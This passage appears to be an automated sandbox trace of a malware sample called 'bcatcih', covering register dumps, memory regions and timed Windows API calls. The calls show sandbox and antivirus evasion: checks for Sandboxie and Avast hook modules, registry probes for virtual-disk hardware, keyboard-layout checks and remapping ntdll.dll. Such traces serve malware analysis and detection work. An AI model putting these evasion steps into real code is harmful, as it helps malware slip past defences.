FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x37c000, Edx=0x0, Ecx=0x0, Eax=0x402dd8, Ebp=0x0, Eip=0x77248fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0181.175] ResumeThread (hThread=0x10c) returned 0x1 [0181.176] CloseHandle (hObject=0x10c) returned 1 [0181.176] CloseHandle (hObject=0x110) returned 1 [0181.176] ExitProcess (uExitCode=0x0) [0181.178] HeapFree (in: hHeap=0x40c0000, dwFlags=0x0, lpMem=0x40c05a8 | out: hHeap=0x40c0000) returned 1 Thread: id = 162 os_tid = 0xd2c Process: id = "7" image_name = "bcatcih" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih" page_root = "0x7191a000" os_pid = "0xd30" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xd24" cmd_line = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2820 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2821 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2822 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2823 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2824 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2825 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2826 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2827 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2828 start_va = 0x400000 end_va = 0x24b2fff monitored = 1 entry_point = 0x4164e7 region_type = mapped_file name = "bcatcih" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih") Region: id = 2829 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2830 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2831 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2832 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2833 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2834 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 3460 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3461 start_va = 0x410000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3462 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3463 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3464 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3465 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3635 start_va = 0x5c0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3636 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3637 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3638 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3639 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3640 start_va = 0x410000 end_va = 0x4cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3641 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 4058 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4059 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4060 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4061 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4062 start_va = 0x7a0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 4063 start_va = 0x4d0000 end_va = 0x4f9fff monitored = 0 entry_point = 0x4d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4064 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 4065 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4149 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4150 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4151 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 4152 start_va = 0xad0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 4165 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4166 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4171 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4172 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4173 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4174 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4183 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4184 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4189 start_va = 0x1ed0000 end_va = 0x202ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 4330 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4600 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4601 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4602 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4603 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4604 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4605 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4606 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4607 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4761 start_va = 0x1ed0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 4762 start_va = 0x2020000 end_va = 0x202ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 4763 start_va = 0x2030000 end_va = 0x21aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4900 start_va = 0x21b0000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 5433 start_va = 0x4e0000 end_va = 0x4e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 5434 start_va = 0x4f0000 end_va = 0x4f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 5437 start_va = 0x500000 end_va = 0x515fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Thread: id = 163 os_tid = 0xd34 [0192.923] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="kernel32" | out: DestinationString="kernel32") [0192.923] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76720000) returned 0x0 [0192.924] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="user32" | out: DestinationString="user32") [0192.924] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x743d0000) returned 0x0 [0195.978] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="advapi32" | out: DestinationString="advapi32") [0195.978] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76600000) returned 0x0 [0200.495] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="shell32" | out: DestinationString="shell32") [0200.495] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74eb0000) returned 0x0 [0213.169] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0213.170] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x7a2768 [0213.170] GetKeyboardLayoutList (in: nBuff=1, lpList=0x7a2768 | out: lpList=0x7a2768) returned 1 [0213.171] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb0c | out: TokenHandle=0x19fb0c*=0x150) returned 1 [0213.171] GetTokenInformation (in: TokenHandle=0x150, TokenInformationClass=0x19, TokenInformation=0x19fb10, TokenInformationLength=0x14, ReturnLength=0x19fb08 | out: TokenInformation=0x19fb10, ReturnLength=0x19fb08) returned 1 [0213.171] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x19fd4c, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0213.172] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0213.175] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x158 [0213.175] MapViewOfFile (hFileMappingObject=0x158, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2030000 [0213.178] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd50, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0213.179] wcsstr (_Str="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", _SubStr="7869.vmt") returned 0x0 [0213.179] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x19ff4c, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x19ff4c, ResultLength=0x0) returned 0x0 [0213.179] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19ff54, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ff54, ReturnLength=0x0) returned 0x0 [0213.179] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0213.179] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0213.180] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0213.180] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x7a8190 [0213.180] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0213.180] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0213.180] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x0) returned 0xc0000034 [0213.181] LocalFree (hMem=0x7a8190) returned 0x0 [0213.181] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x7a8190 [0213.181] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: 